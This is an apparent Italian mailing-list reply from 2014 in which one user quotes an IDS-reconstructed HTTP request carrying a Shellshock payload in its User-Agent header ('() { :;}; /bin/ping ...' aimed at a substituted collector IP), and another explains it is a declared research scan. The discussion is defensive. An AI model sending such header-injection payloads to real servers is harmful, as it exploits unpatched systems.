Il 25/09/2014 12:04, Jan ha scritto:
>Da noi è già arrivato un drone che esegue
>GET /cgi-sys/defaultwebpage.cgi HTTP/1.0{0D}{0A}
>User-Agent: () { :;}; /bin/ping -c 1 192.168.0.1{0D}{0A}
>Accept: */*{0D}{0A}
>{0D}{0A}
>(sessione ricostruita con l'IDS, con 192.168.0.1 sostituisco l'indirizzo
>reale del collettore dell'attaccante)
>Jan
Ciao Jan, lo scan in questione, per quanto "scocciante" possa sembrare, è ben
dichiarato in questo link:
http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html#.VCQI-a1dTRY
fastfire